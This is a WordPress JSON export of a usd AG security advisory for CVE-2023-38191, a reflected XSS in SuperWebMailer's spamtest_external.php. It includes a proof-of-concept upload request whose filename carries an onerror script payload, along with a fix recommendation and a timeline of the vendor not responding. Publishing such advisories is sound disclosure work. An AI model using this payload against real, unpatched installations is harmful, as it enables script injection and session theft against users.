{"id":21106,"date":"2023-10-20T14:47:53","date_gmt":"2023-10-20T12:47:53","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=21106"},"modified":"2023-11-29T09:55:06","modified_gmt":"2023-11-29T08:55:06","slug":"usd-2023-0012","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0012\/","title":{"rendered":"usd-2023-0012"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2023-0012 | Reflected XSS in SuperWebMailer<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2023-0012
\nProduct<\/strong>: SuperWebMailer
\nAffected Version<\/strong>: 9.00.0.01710
\nVulnerability Type<\/strong>: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
\nSecurity Risk<\/strong>: MEDIUM
\nVendor URL<\/strong>: https:\/\/www.superwebmailer.de<\/a>
\nVendor acknowledged vulnerability<\/strong>: No
\nVendor Status<\/strong>: Not fixed
\nCVE number<\/strong>: CVE-2023-38191
\nCVE Link<\/strong>: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-38191<\/a><\/p>\n

Desciption<\/h3>\n

SuperWebMailer is an online application for managing e-mail newsletters.
\nAn unauthenticated Cross-Site Scripting (XSS) vulnerability was discovered during an engagement.
\nIn an XSS attack, a potentially malicious script is injected into a website.<\/p>\n

The spamtest_external.php<\/strong> script is vulnerable to reflected XSS payloads.
\nThe script receives an uploaded file and moves it to a new destination.
\nIf this fails, the script outputs an error message in the plain HTML containing the original filename with insufficient filtering applied.
\nConsequently, on submitting an XSS payload, it is executed.<\/p>\n

Proof of Concept<\/h3>\n

The following request includes JavaScript in the filename of the uploaded file:<\/p>\n

\n
<\/span>POST<\/span> \/spamtest_external.php<\/span> HTTP<\/span>\/<\/span>2\n<\/span>Host<\/span>:<\/span> swm.example.com\n<\/span>Cookie<\/span>:<\/span> PHPSESSID=8ko13lk184llt0rqop2pikbf55; smlswmCsrfToken=20YyMEiUeMAYAEA22yeme6EAYEeIM2UqiqIMiE; ckCsrfToken=A14MJk8mTnYURpJCzOVeiaKIWI0ZoLUdHary7P42\n<\/span>User-Agent<\/span>:<\/span> Mozilla\/5.0 (X11; Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0\n<\/span>Accept<\/span>:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\n<\/span>Accept-Language<\/span>:<\/span> en-US,en;q=0.5\n<\/span>Accept-Encoding<\/span>:<\/span> gzip, deflate\n<\/span>Content-Type<\/span>:<\/span> multipart\/form-data; boundary=---------------------------320118457529952503944082507587\n<\/span>Content-Length<\/span>:<\/span> 289<\/span><\/pre>\n
 <\/p>\n
-----------------------------320118457529952503944082507587
\nContent-Disposition: form-data; name=\"SpamTestFile\"; filename=\"a<img src=1 onerror=alert(document.cookie)>\"
\nContent-Type: application\/x-php<?php phpinfo(); ?>
\n-----------------------------320118457529952503944082507587--<\/p>\n<\/div>\n
As the following screenshot indicates, the above JavaScript is embedded within the application and executed:
\n\"Browser<\/p>\n
Fix<\/h3>\n
It is recommended to treat all input on the website as potentially dangerous. Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.<\/p>\n
References<\/h3>\n
https:\/\/cwe.mitre.org\/data\/definitions\/79.html<\/a>
\nhttps:\/\/owasp.org\/www-community\/attacks\/xss\/<\/p>\n
Timeline<\/h3>\n
    \n
  • 2022-09-26<\/strong>: This vulnerability was discovered by Florian Dewald and Gerbert Roitburd of usd AG.<\/li>\n
  • 2023-04-20<\/strong>: First contact request via info@superwebmailer.de.<\/li>\n
  • 2023-05-08<\/strong>: Reminder sent via info@superwebmailer.de and contact form.<\/li>\n
  • 2023-05-15<\/strong>: Second reminder to webmaster@wt-rate.com and info@superwebmailer.de.<\/li>\n
  • 2023-05-25<\/strong>: Another reminder sent to info@superwebmailer.de, webmaster@wt-rate.com and info@wt-rate.com<\/li>\n
  • 2023-06-05<\/strong>: Once more tried to inform the company of the vulnerabilities via the feedback form (info@superwebmailer.de).<\/li>\n
  • 2023-07-17<\/strong>: Sent another email to info@supermailer.de, webmaster@wt-rate.com, info@wt-rate.com and info@superwebmailer.de, stressing that CVEs are assigned to the vulnerabilities and disclosure may happen in case we do not receive an answer soon.<\/li>\n
  • 2023-08-17<\/strong>: As the vulnerabilities were found during a pentest, the customer was asked whether or not the Responsible Disclosure Team should move forward without the software vendor's cooperation.<\/li>\n
  • 2023-10-02<\/strong>: Final notice given to info@superwebmailer, warning of immenent disclosure should there be no response within a week.<\/li>\n
  • 2023-10-20<\/strong>: Vulnerabilities disclosed by usd AG.<\/li>\n<\/ul>\n
    Credits<\/h3>\n
    This security vulnerability was identified by Florian Dewald and Gerbert Roitburd of usd AG.[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"
    usd-2023-0012 | Reflected XSS in SuperWebMailer Advisory ID: usd-2023-0012 Product: SuperWebMailer Affected Version: 9.00.0.01710 Vulnerability Type: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Security Risk: MEDIUM Vendor URL: https:\/\/www.superwebmailer.de Vendor acknowledged vulnerability: No Vendor Status: Not fixed CVE number: CVE-2023-38191 CVE Link: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-38191 Desciption SuperWebMailer is an online application for managing […]<\/p>\n","protected":false},"author":114,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-21106","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21106","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/114"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=21106"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21106\/revisions"}],"predecessor-version":[{"id":21514,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21106\/revisions\/21514"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=21106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}